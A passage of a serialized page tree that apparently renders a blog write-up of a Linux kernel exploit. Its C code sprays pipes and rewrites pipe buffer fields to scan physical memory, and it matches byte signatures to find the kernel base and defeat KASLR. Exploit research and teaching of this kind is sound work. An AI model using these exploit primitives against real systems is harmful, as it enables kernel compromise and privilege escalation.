phys-KASLR\"",{"type":25,"tag":216,"props":62467,"children":62468},{"style":6964},[62469],{"type":31,"value":7797},{"type":25,"tag":216,"props":62471,"children":62472},{"class":6922,"line":7244},[62473,62477,62481,62485,62489,62493,62497,62502,62506],{"type":25,"tag":216,"props":62474,"children":62475},{"style":6973},[62476],{"type":31,"value":6976},{"type":25,"tag":216,"props":62478,"children":62479},{"style":6964},[62480],{"type":31,"value":7016},{"type":25,"tag":216,"props":62482,"children":62483},{"style":6936},[62484],{"type":31,"value":59603},{"type":25,"tag":216,"props":62486,"children":62487},{"style":6964},[62488],{"type":31,"value":58512},{"type":25,"tag":216,"props":62490,"children":62491},{"style":6953},[62492],{"type":31,"value":266},{"type":25,"tag":216,"props":62494,"children":62495},{"style":6989},[62496],{"type":31,"value":6992},{"type":25,"tag":216,"props":62498,"children":62499},{"style":6964},[62500],{"type":31,"value":62501},";; i",{"type":25,"tag":216,"props":62503,"children":62504},{"style":6953},[62505],{"type":31,"value":55238},{"type":25,"tag":216,"props":62507,"children":62508},{"style":6964},[62509],{"type":31,"value":7107},{"type":25,"tag":216,"props":62511,"children":62512},{"class":6922,"line":7257},[62513],{"type":25,"tag":216,"props":62514,"children":62515},{"style":6964},[62516],{"type":31,"value":33147},{"type":25,"tag":216,"props":62518,"children":62519},{"class":6922,"line":7275},[62520,62525,62529,62534,62538,62543,62547,62552,62556],{"type":25,"tag":216,"props":62521,"children":62522},{"style":6964},[62523],{"type":31,"value":62524},"        kernel_base ",{"type":25,"tag":216,"props":62526,"children":62527},{"style":6953},[62528],{"type":31,"value":266},{"type":25,"tag":216,"props":62530,"children":62531},{"style":6989},[62532],{"type":31,"value":62533}," 0x40",{"type":25,"tag":216,"props":62535,"children":62536},{"style":6953},[62537],{"type":31,"value":13773},{"type":25,"tag":216,"props":62539,"children":62540},{"style":6964},[62541],{"type":31,"value":62542}," ((PHYSICAL_ALIGN ",{"type":25,"tag":216,"props":62544,"children":62545},{"style":6953},[62546],{"type":31,"value":8519},{"type":25,"tag":216,"props":62548,"children":62549},{"style":6964},[62550],{"type":31,"value":62551}," i) ",{"type":25,"tag":216,"props":62553,"children":62554},{"style":6953},[62555],{"type":31,"value":16717},{"type":25,"tag":216,"props":62557,"children":62558},{"style":6964},[62559],{"type":31,"value":62560}," PAGE_SHIFT);\n",{"type":25,"tag":216,"props":62562,"children":62563},{"class":6922,"line":7296},[62564,62569,62573,62577,62581,62586,62590],{"type":25,"tag":216,"props":62565,"children":62566},{"style":6947},[62567],{"type":31,"value":62568},"        pipebuf",{"type":25,"tag":216,"props":62570,"children":62571},{"style":6964},[62572],{"type":31,"value":17714},{"type":25,"tag":216,"props":62574,"children":62575},{"style":6947},[62576],{"type":31,"value":62292},{"type":25,"tag":216,"props":62578,"children":62579},{"style":6953},[62580],{"type":31,"value":6956},{"type":25,"tag":216,"props":62582,"children":62583},{"style":6964},[62584],{"type":31,"value":62585}," vmemmap_base ",{"type":25,"tag":216,"props":62587,"children":62588},{"style":6953},[62589],{"type":31,"value":3539},{"type":25,"tag":216,"props":62591,"children":62592},{"style":6964},[62593],{"type":31,"value":62594}," kernel_base;\n",{"type":25,"tag":216,"props":62596,"children":62597},{"class":6922,"line":7305},[62598,62602,62606,62610,62614,62618],{"type":25,"tag":216,"props":62599,"children":62600},{"style":6947},[62601],{"type":31,"value":62568},{"type":25,"tag":216,"props":62603,"children":62604},{"style":6964},[62605],{"type":31,"value":17714},{"type":25,"tag":216,"props":62607,"children":62608},{"style":6947},[62609],{"type":31,"value":17858},{"type":25,"tag":216,"props":62611,"children":62612},{"style":6953},[62613],{"type":31,"value":6956},{"type":25,"tag":216,"props":62615,"children":62616},{"style":6989},[62617],{"type":31,"value":6992},{"type":25,"tag":216,"props":62619,"children":62620},{"style":6964},[62621],{"type":31,"value":6967},{"type":25,"tag":216,"props":62623,"children":62624},{"class":6922,"line":7557},[62625,62629,62633,62637,62641,62646,62650,62654],{"type":25,"tag":216,"props":62626,"children":62627},{"style":6947},[62628],{"type":31,"value":62568},{"type":25,"tag":216,"props":62630,"children":62631},{"style":6964},[62632],{"type":31,"value":17714},{"type":25,"tag":216,"props":62634,"children":62635},{"style":6947},[62636],{"type":31,"value":13094},{"type":25,"tag":216,"props":62638,"children":62639},{"style":6953},[62640],{"type":31,"value":6956},{"type":25,"tag":216,"props":62642,"children":62643},{"style":6964},[62644],{"type":31,"value":62645}," PAGE_SIZE ",{"type":25,"tag":216,"props":62647,"children":62648},{"style":6953},[62649],{"type":31,"value":3539},{"type":25,"tag":216,"props":62651,"children":62652},{"style":6989},[62653],{"type":31,"value":8471},{"type":25,"tag":216,"props":62655,"children":62656},{"style":6964},[62657],{"type":31,"value":6967},{"type":25,"tag":216,"props":62659,"children":62660},{"class":6922,"line":7574},[62661],{"type":25,"tag":216,"props":62662,"children":62663},{"style":6964},[62664],{"type":31,"value":14275},{"type":25,"tag":216,"props":62666,"children":62667},{"class":6922,"line":7591},[62668,62673,62677,62681,62685,62689,62694,62698,62703,62707],{"type":25,"tag":216,"props":62669,"children":62670},{"style":6964},[62671],{"type":31,"value":62672},"        for (",{"type":25,"tag":216,"props":62674,"children":62675},{"style":6936},[62676],{"type":31,"value":23007},{"type":25,"tag":216,"props":62678,"children":62679},{"style":6947},[62680],{"type":31,"value":12576},{"type":25,"tag":216,"props":62682,"children":62683},{"style":6953},[62684],{"type":31,"value":6956},{"type":25,"tag":216,"props":62686,"children":62687},{"style":6989},[62688],{"type":31,"value":6992},{"type":25,"tag":216,"props":62690,"children":62691},{"style":6964},[62692],{"type":31,"value":62693},"; j ",{"type":25,"tag":216,"props":62695,"children":62696},{"style":6953},[62697],{"type":31,"value":9757},{"type":25,"tag":216,"props":62699,"children":62700},{"style":6964},[62701],{"type":31,"value":62702}," PIPE_SPRAY; j",{"type":25,"tag":216,"props":62704,"children":62705},{"style":6953},[62706],{"type":31,"value":55238},{"type":25,"tag":216,"props":62708,"children":62709},{"style":6964},[62710],{"type":31,"value":7107},{"type":25,"tag":216,"props":62712,"children":62713},{"class":6922,"line":7604},[62714],{"type":25,"tag":216,"props":62715,"children":62716},{"style":6964},[62717],{"type":31,"value":35621},{"type":25,"tag":216,"props":62719,"children":62720},{"class":6922,"line":7613},[62721,62726,62730,62734,62739,62743],{"type":25,"tag":216,"props":62722,"children":62723},{"style":7047},[62724],{"type":31,"value":62725},"            memset",{"type":25,"tag":216,"props":62727,"children":62728},{"style":6964},[62729],{"type":31,"value":1850},{"type":25,"tag":216,"props":62731,"children":62732},{"style":6953},[62733],{"type":31,"value":7059},{"type":25,"tag":216,"props":62735,"children":62736},{"style":6964},[62737],{"type":31,"value":62738},"data, ",{"type":25,"tag":216,"props":62740,"children":62741},{"style":6989},[62742],{"type":31,"value":1882},{"type":25,"tag":216,"props":62744,"children":62745},{"style":6964},[62746],{"type":31,"value":62747},", PAGE_SIZE);\n",{"type":25,"tag":216,"props":62749,"children":62750},{"class":6922,"line":7636},[62751,62756],{"type":25,"tag":216,"props":62752,"children":62753},{"style":6936},[62754],{"type":31,"value":62755},"            int",{"type":25,"tag":216,"props":62757,"children":62758},{"style":6964},[62759],{"type":31,"value":62760}," count;\n",{"type":25,"tag":216,"props":62762,"children":62763},{"class":6922,"line":7645},[62764,62769,62774,62778,62783,62787,62792,62797,62801,62805,62809,62814,62818,62822],{"type":25,"tag":216,"props":62765,"children":62766},{"style":6973},[62767],{"type":31,"value":62768},"            if",{"type":25,"tag":216,"props":62770,"children":62771},{"style":6964},[62772],{"type":31,"value":62773}," (count ",{"type":25,"tag":216,"props":62775,"children":62776},{"style":6953},[62777],{"type":31,"value":266},{"type":25,"tag":216,"props":62779,"children":62780},{"style":7047},[62781],{"type":31,"value":62782}," read",{"type":25,"tag":216,"props":62784,"children":62785},{"style":6964},[62786],{"type":31,"value":1850},{"type":25,"tag":216,"props":62788,"children":62789},{"style":6947},[62790],{"type":31,"value":62791},"pfd",{"type":25,"tag":216,"props":62793,"children":62794},{"style":6964},[62795],{"type":31,"value":62796},"[j][",{"type":25,"tag":216,"props":62798,"children":62799},{"style":6989},[62800],{"type":31,"value":1882},{"type":25,"tag":216,"props":62802,"children":62803},{"style":6964},[62804],{"type":31,"value":27006},{"type":25,"tag":216,"props":62806,"children":62807},{"style":6953},[62808],{"type":31,"value":7059},{"type":25,"tag":216,"props":62810,"children":62811},{"style":6964},[62812],{"type":31,"value":62813},"data, PAGE_SIZE) ",{"type":25,"tag":216,"props":62815,"children":62816},{"style":6953},[62817],{"type":31,"value":9757},{"type":25,"tag":216,"props":62819,"children":62820},{"style":6989},[62821],{"type":31,"value":6992},{"type":25,"tag":216,"props":62823,"children":62824},{"style":6964},[62825],{"type":31,"value":7107},{"type":25,"tag":216,"props":62827,"children":62828},{"class":6922,"line":7654},[62829],{"type":25,"tag":216,"props":62830,"children":62831},{"style":6964},[62832],{"type":31,"value":35657},{"type":25,"tag":216,"props":62834,"children":62835},{"class":6922,"line":7722},[62836,62841],{"type":25,"tag":216,"props":62837,"children":62838},{"style":6973},[62839],{"type":31,"value":62840},"                continue",{"type":25,"tag":216,"props":62842,"children":62843},{"style":6964},[62844],{"type":31,"value":6967},{"type":25,"tag":216,"props":62846,"children":62847},{"class":6922,"line":7730},[62848],{"type":25,"tag":216,"props":62849,"children":62850},{"style":6964},[62851],{"type":31,"value":62852},"            }\n",{"type":25,"tag":216,"props":62854,"children":62855},{"class":6922,"line":7760},[62856],{"type":25,"tag":216,"props":62857,"children":62858},{"style":6964},[62859],{"type":31,"value":14275},{"type":25,"tag":216,"props":62861,"children":62862},{"class":6922,"line":7768},[62863],{"type":25,"tag":216,"props":62864,"children":62865},{"emptyLinePlaceholder":16},[62866],{"type":31,"value":7642},{"type":25,"tag":216,"props":62868,"children":62869},{"class":6922,"line":7800},[62870,62875,62880,62884,62888],{"type":25,"tag":216,"props":62871,"children":62872},{"style":6964},[62873],{"type":31,"value":62874},"            if (",{"type":25,"tag":216,"props":62876,"children":62877},{"style":7375},[62878],{"type":31,"value":62879},"is_kernel_base",{"type":25,"tag":216,"props":62881,"children":62882},{"style":6964},[62883],{"type":31,"value":1850},{"type":25,"tag":216,"props":62885,"children":62886},{"style":7375},[62887],{"type":31,"value":7669},{"type":25,"tag":216,"props":62889,"children":62890},{"style":6964},[62891],{"type":31,"value":62892},")) // [1] identify kernel base\n",{"type":25,"tag":216,"props":62894,"children":62895},{"class":6922,"line":7808},[62896],{"type":25,"tag":216,"props":62897,"children":62898},{"style":6964},[62899],{"type":31,"value":35657},{"type":25,"tag":216,"props":62901,"children":62902},{"class":6922,"line":7868},[62903,62908,62912,62916],{"type":25,"tag":216,"props":62904,"children":62905},{"style":6964},[62906],{"type":31,"value":62907},"                found ",{"type":25,"tag":216,"props":62909,"children":62910},{"style":6953},[62911],{"type":31,"value":266},{"type":25,"tag":216,"props":62913,"children":62914},{"style":6936},[62915],{"type":31,"value":16425},{"type":25,"tag":216,"props":62917,"children":62918},{"style":6964},[62919],{"type":31,"value":6967},{"type":25,"tag":216,"props":62921,"children":62922},{"class":6922,"line":13001},[62923,62928],{"type":25,"tag":216,"props":62924,"children":62925},{"style":6973},[62926],{"type":31,"value":62927},"                break",{"type":25,"tag":216,"props":62929,"children":62930},{"style":6964},[62931],{"type":31,"value":6967},{"type":25,"tag":216,"props":62933,"children":62934},{"class":6922,"line":13019},[62935],{"type":25,"tag":216,"props":62936,"children":62937},{"style":6964},[62938],{"type":31,"value":62852},{"type":25,"tag":216,"props":62940,"children":62941},{"class":6922,"line":13064},[62942],{"type":25,"tag":216,"props":62943,"children":62944},{"style":6964},[62945],{"type":31,"value":7302},{"type":25,"tag":216,"props":62947,"children":62948},{"class":6922,"line":13170},[62949],{"type":25,"tag":216,"props":62950,"children":62951},{"emptyLinePlaceholder":16},[62952],{"type":31,"value":7642},{"type":25,"tag":216,"props":62954,"children":62955},{"class":6922,"line":27455},[62956],{"type":25,"tag":216,"props":62957,"children":62958},{"style":6964},[62959],{"type":31,"value":14275},{"type":25,"tag":38,"props":62961,"children":62962},{},[62963,62965,62969,62971,62977,62979,62983],{"type":31,"value":62964},"Notice that at ",{"type":25,"tag":216,"props":62966,"children":62967},{},[62968],{"type":31,"value":184},{"type":31,"value":62970}," we call the ",{"type":25,"tag":82,"props":62972,"children":62974},{"className":62973},[],[62975],{"type":31,"value":62976},"is_kernel_base()",{"type":31,"value":62978}," function. This is a function based on lau's exploit ",{"type":25,"tag":216,"props":62980,"children":62981},{},[62982],{"type":31,"value":22067},{"type":31,"value":62984}," that basically matches for multiple byte patterns that may exist at the kernel base page across different builds, to maximize compatibility.",{"type":25,"tag":206,"props":62986,"children":62988},{"className":33070,"code":62987,"language":33072,"meta":7,"style":7},"[...]\nstatic bool is_kernel_base(unsigned char *addr)\n{\n    // thanks lau :)\n\n    // get-sig kernel_runtime_1\n    if (memcmp(addr + 0x0, \"\\x48\\x8d\\x25\\x51\\x3f\", 5) == 0 &&\n        memcmp(addr + 0x7, \"\\x48\\x8d\\x3d\\xf2\\xff\\xff\\xff\", 7) == 0)\n        return true;\n\n    // get-sig kernel_runtime_2\n    if (memcmp(addr + 0x0, \"\\xfc\\x0f\\x01\\x15\", 4) == 0 &&\n        memcmp(addr + 0x8, \"\\xb8\\x10\\x00\\x00\\x00\\x8e\\xd8\\x8e\\xc0\\x8e\\xd0\\xbf\", 12) == 0 &&\n        memcmp(addr + 0x18, \"\\x89\\xde\\x8b\\x0d\", 4) == 0 &&\n        memcmp(addr + 0x20, \"\\xc1\\xe9\\x02\\xf3\\xa5\\xbc\", 6) == 0 &&\n        memcmp(addr + 0x2a, \"\\x0f\\x20\\xe0\\x83\\xc8\\x20\\x0f\\x22\\xe0\\xb9\\x80\\x00\\x00\\xc0\\x0f\\x32\\x0f\\xba\\xe8\\x08\\x0f\\x30\\xb8\\x00\", 24) == 0 &&\n        memcmp(addr + 0x45, \"\\x0f\\x22\\xd8\\xb8\\x01\\x00\\x00\\x80\\x0f\\x22\\xc0\\xea\\x57\\x00\\x00\", 15) == 0 &&\n        memcmp(addr + 0x55, \"\\x08\\x00\\xb9\\x01\\x01\\x00\\xc0\\xb8\", 8) == 0 &&\n        memcmp(addr + 0x61, \"\\x31\\xd2\\x0f\\x30\\xe8\", 5) == 0 &&\n        memcmp(addr + 0x6a, \"\\x48\\xc7\\xc6\", 3) == 0 &&\n        memcmp(addr + 0x71, \"\\x48\\xc7\\xc0\\x80\\x00\\x00\", 6) == 0 &&\n        memcmp(addr + 0x78, \"\\xff\\xe0\", 2) == 0)\n        return true;\n\n    return false;\n}\n[...]\n",[62989],{"type":25,"tag":82,"props":62990,"children":62991},{"__ignoreMap":7},[62992,62999,63029,63036,63044,63051,63059,63130,63192,63207,63214,63222,63290,63352,63413,63474,63536,63598,63659,63720,63781,63842,63903,63918,63925,63940,63947],{"type":25,"tag":216,"props":62993,"children":62994},{"class":6922,"line":6923},[62995],{"type":25,"tag":216,"props":62996,"children":62997},{"style":6964},[62998],{"type":31,"value":14275},{"type":25,"tag":216,"props":63000,"children":63001},{"class":6922,"line":6769},[63002,63007,63012,63017,63021,63025],{"type":25,"tag":216,"props":63003,"children":63004},{"style":6964},[63005],{"type":31,"value":63006},"static bool is_kernel_base(",{"type":25,"tag":216,"props":63008,"children":63009},{"style":6936},[63010],{"type":31,"value":63011},"unsigned",{"type":25,"tag":216,"props":63013,"children":63014},{"style":6936},[63015],{"type":31,"value":63016}," char",{"type":25,"tag":216,"props":63018,"children":63019},{"style":6936},[63020],{"type":31,"value":13773},{"type":25,"tag":216,"props":63022,"children":63023},{"style":6947},[63024],{"type":31,"value":34648},{"type":25,"tag":216,"props":63026,"children":63027},{"style":6964},[63028],{"type":31,"value":7107},{"type":25,"tag":216,"props":63030,"children":63031},{"class":6922,"line":6778},[63032],{"type":25,"tag":216,"props":63033,"children":63034},{"style":6964},[63035],{"type":31,"value":14836},{"type":25,"tag":216,"props":63037,"children":63038},{"class":6922,"line":7005},[63039],{"type":25,"tag":216,"props":63040,"children":63041},{"style":6927},[63042],{"type":31,"value":63043},"    // thanks lau :)\n",{"type":25,"tag":216,"props":63045,"children":63046},{"class":6922,"line":7110},[63047],{"type":25,"tag":216,"props":63048,"children":63049},{"emptyLinePlaceholder":16},[63050],{"type":31,"value":7642},{"type":25,"tag":216,"props":63052,"children":63053},{"class":6922,"line":7216},[63054],{"type":25,"tag":216,"props":63055,"children":63056},{"style":6927},[63057],{"type":31,"value":63058},"    // get-sig kernel_runtime_1\n",{"type":25,"tag":216,"props":63060,"children":63061},{"class":6922,"line":7244},[63062,63066,63070,63075,63080,63084,63089,63093,63097,63102,63106,63110,63114,63118,63122,63126],{"type":25,"tag":216,"props":63063,"children":63064},{"style":6973},[63065],{"type":31,"value":16235},{"type":25,"tag":216,"props":63067,"children":63068},{"style":6964},[63069],{"type":31,"value":7016},{"type":25,"tag":216,"props":63071,"children":63072},{"style":7047},[63073],{"type":31,"value":63074},"memcmp",{"type":25,"tag":216,"props":63076,"children":63077},{"style":6964},[63078],{"type":31,"value":63079},"(addr ",{"type":25,"tag":216,"props":63081,"children":63082},{"style":6953},[63083],{"type":31,"value":3539},{"type":25,"tag":216,"props":63085,"children":63086},{"style":6989},[63087],{"type":31,"value":63088}," 0x0",{"type":25,"tag":216,"props":63090,"children":63091},{"style":6964},[63092],{"type":31,"value":7026},{"type":25,"tag":216,"props":63094,"children":63095},{"style":8205},[63096],{"type":31,"value":24020},{"type":25,"tag":216,"props":63098,"children":63099},{"style":52342},[63100],{"type":31,"value":63101},"\\x48\\x8d\\x25\\x51\\x3f",{"type":25,"tag":216,"props":63103,"children":63104},{"style":8205},[63105],{"type":31,"value":24020},{"type":25,"tag":216,"props":63107,"children":63108},{"style":6964},[63109],{"type":31,"value":7026},{"type":25,"tag":216,"props":63111,"children":63112},{"style":6989},[63113],{"type":31,"value":22067},{"type":25,"tag":216,"props":63115,"children":63116},{"style":6964},[63117],{"type":31,"value":7036},{"type":25,"tag":216,"props":63119,"children":63120},{"style":6953},[63121],{"type":31,"value":12528},{"type":25,"tag":216,"props":63123,"children":63124},{"style":6989},[63125],{"type":31,"value":6992},{"type":25,"tag":216,"props":63127,"children":63128},{"style":6953},[63129],{"type":31,"value":56652},{"type":25,"tag":216,"props":63131,"children":63132},{"class":6922,"line":7257},[63133,63138,63142,63146,63151,63155,63159,63164,63168,63172,63176,63180,63184,63188],{"type":25,"tag":216,"props":63134,"children":63135},{"style":7047},[63136],{"type":31,"value":63137},"        memcmp",{"type":25,"tag":216,"props":63139,"children":63140},{"style":6964},[63141],{"type":31,"value":63079},{"type":25,"tag":216,"props":63143,"children":63144},{"style":6953},[63145],{"type":31,"value":3539},{"type":25,"tag":216,"props":63147,"children":63148},{"style":6989},[63149],{"type":31,"value":63150}," 0x7",{"type":25,"tag":216,"props":63152,"children":63153},{"style":6964},[63154],{"type":31,"value":7026},{"type":25,"tag":216,"props":63156,"children":63157},{"style":8205},[63158],{"type":31,"value":24020},{"type":25,"tag":216,"props":63160,"children":63161},{"style":52342},[63162],{"type":31,"value":63163},"\\x48\\x8d\\x3d\\xf2\\xff\\xff\\xff",{"type":25,"tag":216,"props":63165,"children":63166},{"style":8205},[63167],{"type":31,"value":24020},{"type":25,"tag":216,"props":63169,"children":63170},{"style":6964},[63171],{"type":31,"value":7026},{"type":25,"tag":216,"props":63173,"children":63174},{"style":6989},[63175],{"type":31,"value":58639},{"type":25,"tag":216,"props":63177,"children":63178},{"style":6964},[63179],{"type":31,"value":7036},{"type":25,"tag":216,"props":63181,"children":63182},{"style":6953},[63183],{"type":31,"value":12528},{"type":25,"tag":216,"props":63185,"children":63186},{"style":6989},[63187],{"type":31,"value":6992},{"type":25,"tag":216,"props":63189,"children":63190},{"style":6964},[63191],{"type":31,"value":7107},{"type":25,"tag":216,"props":63193,"children":63194},{"class":6922,"line":7275},[63195,63199,63203],{"type":25,"tag":216,"props":63196,"children":63197},{"style":6973},[63198],{"type":31,"value":19702},{"type":25,"tag":216,"props":63200,"children":63201},{"style":6936},[63202],{"type":31,"value":16425},{"type":25,"tag":216,"props":63204,"children":63205},{"style":6964},[63206],{"type":31,"value":6967},{"type":25,"tag":216,"props":63208,"children":63209},{"class":6922,"line":7296},[63210],{"type":25,"tag":216,"props":63211,"children":63212},{"emptyLinePlaceholder":16},[63213],{"type":31,"value":7642},{"type":25,"tag":216,"props":63215,"children":63216},{"class":6922,"line":7305},[63217],{"type":25,"tag":216,"props":63218,"children":63219},{"style":6927},[63220],{"type":31,"value":63221},"    // get-sig kernel_runtime_2\n",{"type":25,"tag":216,"props":63223,"children":63224},{"class":6922,"line":7557},[63225,63229,63233,63237,63241,63245,63249,63253,63257,63262,63266,63270,63274,63278,63282,63286],{"type":25,"tag":216,"props":63226,"children":63227},{"style":6973},[63228],{"type":31,"value":16235},{"type":25,"tag":216,"props":63230,"children":63231},{"style":6964},[63232],{"type":31,"value":7016},{"type":25,"tag":216,"props":63234,"children":63235},{"style":7047},[63236],{"type":31,"value":63074},{"type":25,"tag":216,"props":63238,"children":63239},{"style":6964},[63240],{"type":31,"value":63079},{"type":25,"tag":216,"props":63242,"children":63243},{"style":6953},[63244],{"type":31,"value":3539},{"type":25,"tag":216,"props":63246,"children":63247},{"style":6989},[63248],{"type":31,"value":63088},{"type":25,"tag":216,"props":63250,"children":63251},{"style":6964},[63252],{"type":31,"value":7026},{"type":25,"tag":216,"props":63254,"children":63255},{"style":8205},[63256],{"type":31,"value":24020},{"type":25,"tag":216,"props":63258,"children":63259},{"style":52342},[63260],{"type":31,"value":63261},"\\xfc\\x0f\\x01\\x15",{"type":25,"tag":216,"props":63263,"children":63264},{"style":8205},[63265],{"type":31,"value":24020},{"type":25,"tag":216,"props":63267,"children":63268},{"style":6964},[63269],{"type":31,"value":7026},{"type":25,"tag":216,"props":63271,"children":63272},{"style":6989},[63273],{"type":31,"value":21486},{"type":25,"tag":216,"props":63275,"children":63276},{"style":6964},[63277],{"type":31,"value":7036},{"type":25,"tag":216,"props":63279,"children":63280},{"style":6953},[63281],{"type":31,"value":12528},{"type":25,"tag":216,"props":63283,"children":63284},{"style":6989},[63285],{"type":31,"value":6992},{"type":25,"tag":216,"props":63287,"children":63288},{"style":6953},[63289],{"type":31,"value":56652},{"type":25,"tag":216,"props":63291,"children":63292},{"class":6922,"line":7574},[63293,63297,63301,63305,63310,63314,63318,63323,63327,63331,63336,63340,63344,63348],{"type":25,"tag":216,"props":63294,"children":63295},{"style":7047},[63296],{"type":31,"value":63137},{"type":25,"tag":216,"props":63298,"children":63299},{"style":6964},[63300],{"type":31,"value":63079},{"type":25,"tag":216,"props":63302,"children":63303},{"style":6953},[63304],{"type":31,"value":3539},{"type":25,"tag":216,"props":63306,"children":63307},{"style":6989},[63308],{"type":31,"value":63309}," 0x8",{"type":25,"tag":216,"props":63311,"children":63312},{"style":6964},[63313],{"type":31,"value":7026},{"type":25,"tag":216,"props":63315,"children":63316},{"style":8205},[63317],{"type":31,"value":24020},{"type":25,"tag":216,"props":63319,"children":63320},{"style":52342},[63321],{"type":31,"value":63322},"\\xb8\\x10\\x00\\x00\\x00\\x8e\\xd8\\x8e\\xc0\\x8e\\xd0\\xbf",{"type":25,"tag":216,"props":63324,"children":63325},{"style":8205},[63326],{"type":31,"value":24020},{"type":25,"tag":216,"props":63328,"children":63329},{"style":6964},[63330],{"type":31,"value":7026},{"type":25,"tag":216,"props":63332,"children":63333},{"style":6989},[63334],{"type":31,"value":63335},"12",{"type":25,"tag":216,"props":63337,"children":63338},{"style":6964},[63339],{"type":31,"value":7036},{"type":25,"tag":216,"props":63341,"children":63342},{"style":6953},[63343],{"type":31,"value":12528},{"type":25,"tag":216,"props":63345,"children":63346},{"style":6989},[63347],{"type":31,"value":6992},{"type":25,"tag":216,"props":63349,"children":63350},{"style":6953},[63351],{"type":31,"value":56652},{"type":25,"tag":216,"props":63353,"children":63354},{"class":6922,"line":7591},[63355,63359,63363,63367,63372,63376,63380,63385,63389,63393,63397,63401,63405,63409],{"type":25,"tag":216,"props":63356,"children":63357},{"style":7047},[63358],{"type":31,"value":63137},{"type":25,"tag":216,"props":63360,"children":63361},{"style":6964},[63362],{"type":31,"value":63079},{"type":25,"tag":216,"props":63364,"children":63365},{"style":6953},[63366],{"type":31,"value":3539},{"type":25,"tag":216,"props":63368,"children":63369},{"style":6989},[63370],{"type":31,"value":63371}," 0x18",{"type":25,"tag":216,"props":63373,"children":63374},{"style":6964},[63375],{"type":31,"value":7026},{"type":25,"tag":216,"props":63377,"children":63378},{"style":8205},[63379],{"type":31,"value":24020},{"type":25,"tag":216,"props":63381,"children":63382},{"style":52342},[63383],{"type":31,"value":63384},"\\x89\\xde\\x8b\\x0d",{"type":25,"tag":216,"props":63386,"children":63387},{"style":8205},[63388],{"type":31,"value":24020},{"type":25,"tag":216,"props":63390,"children":63391},{"style":6964},[63392],{"type":31,"value":7026},{"type":25,"tag":216,"props":63394,"children":63395},{"style":6989},[63396],{"type":31,"value":21486},{"type":25,"tag":216,"props":63398,"children":63399},{"style":6964},[63400],{"type":31,"value":7036},{"type":25,"tag":216,"props":63402,"children":63403},{"style":6953},[63404],{"type":31,"value":12528},{"type":25,"tag":216,"props":63406,"children":63407},{"style":6989},[63408],{"type":31,"value":6992},{"type":25,"tag":216,"props":63410,"children":63411},{"style":6953},[63412],{"type":31,"value":56652},{"type":25,"tag":216,"props":63414,"children":63415},{"class":6922,"line":7604},[63416,63420,63424,63428,63433,63437,63441,63446,63450,63454,63458,63462,63466,63470],{"type":25,"tag":216,"props":63417,"children":63418},{"style":7047},[63419],{"type":31,"value":63137},{"type":25,"tag":216,"props":63421,"children":63422},{"style":6964},[63423],{"type":31,"value":63079},{"type":25,"tag":216,"props":63425,"children":63426},{"style":6953},[63427],{"type":31,"value":3539},{"type":25,"tag":216,"props":63429,"children":63430},{"style":6989},[63431],{"type":31,"value":63432}," 0x20",{"type":25,"tag":216,"props":63434,"children":63435},{"style":6964},[63436],{"type":31,"value":7026},{"type":25,"tag":216,"props":63438,"children":63439},{"style":8205},[63440],{"type":31,"value":24020},{"type":25,"tag":216,"props":63442,"children":63443},{"style":52342},[63444],{"type":31,"value":63445},"\\xc1\\xe9\\x02\\xf3\\xa5\\xbc",{"type":25,"tag":216,"props":63447,"children":63448},{"style":8205},[63449],{"type":31,"value":24020},{"type":25,"tag":216,"props":63451,"children":63452},{"style":6964},[63453],{"type":31,"value":7026},{"type":25,"tag":216,"props":63455,"children":63456},{"style":6989},[63457],{"type":31,"value":22379},{"type":25,"tag":216,"props":63459,"children":63460},{"style":6964},[63461],{"type":31,"value":7036},{"type":25,"tag":216,"props":63463,"children":63464},{"style":6953},[63465],{"type":31,"value":12528},{"type":25,"tag":216,"props":63467,"children":63468},{"style":6989},[63469],{"type":31,"value":6992},{"type":25,"tag":216,"props":63471,"children":63472},{"style":6953},[63473],{"type":31,"value":56652},{"type":25,"tag":216,"props":63475,"children":63476},{"class":6922,"line":7613},[63477,63481,63485,63489,63494,63498,63502,63507,63511,63515,63520,63524,63528,63532],{"type":25,"tag":216,"props":63478,"children":63479},{"style":7047},[63480],{"type":31,"value":63137},{"type":25,"tag":216,"props":63482,"children":63483},{"style":6964},[63484],{"type":31,"value":63079},{"type":25,"tag":216,"props":63486,"children":63487},{"style":6953},[63488],{"type":31,"value":3539},{"type":25,"tag":216,"props":63490,"children":63491},{"style":6989},[63492],{"type":31,"value":63493}," 0x2a",{"type":25,"tag":216,"props":63495,"children":63496},{"style":6964},[63497],{"type":31,"value":7026},{"type":25,"tag":216,"props":63499,"children":63500},{"style":8205},[63501],{"type":31,"value":24020},{"type":25,"tag":216,"props":63503,"children":63504},{"style":52342},[63505],{"type":31,"value":63506},"\\x0f\\x20\\xe0\\x83\\xc8\\x20\\x0f\\x22\\xe0\\xb9\\x80\\x00\\x00\\xc0\\x0f\\x32\\x0f\\xba\\xe8\\x08\\x0f\\x30\\xb8\\x00",{"type":25,"tag":216,"props":63508,"children":63509},{"style":8205},[63510],{"type":31,"value":24020},{"type":25,"tag":216,"props":63512,"children":63513},{"style":6964},[63514],{"type":31,"value":7026},{"type":25,"tag":216,"props":63516,"children":63517},{"style":6989},[63518],{"type":31,"value":63519},"24",{"type":25,"tag":216,"props":63521,"children":63522},{"style":6964},[63523],{"type":31,"value":7036},{"type":25,"tag":216,"props":63525,"children":63526},{"style":6953},[63527],{"type":31,"value":12528},{"type":25,"tag":216,"props":63529,"children":63530},{"style":6989},[63531],{"type":31,"value":6992},{"type":25,"tag":216,"props":63533,"children":63534},{"style":6953},[63535],{"type":31,"value":56652},{"type":25,"tag":216,"props":63537,"children":63538},{"class":6922,"line":7636},[63539,63543,63547,63551,63556,63560,63564,63569,63573,63577,63582,63586,63590,63594],{"type":25,"tag":216,"props":63540,"children":63541},{"style":7047},[63542],{"type":31,"value":63137},{"type":25,"tag":216,"props":63544,"children":63545},{"style":6964},[63546],{"type":31,"value":63079},{"type":25,"tag":216,"props":63548,"children":63549},{"style":6953},[63550],{"type":31,"value":3539},{"type":25,"tag":216,"props":63552,"children":63553},{"style":6989},[63554],{"type":31,"value":63555}," 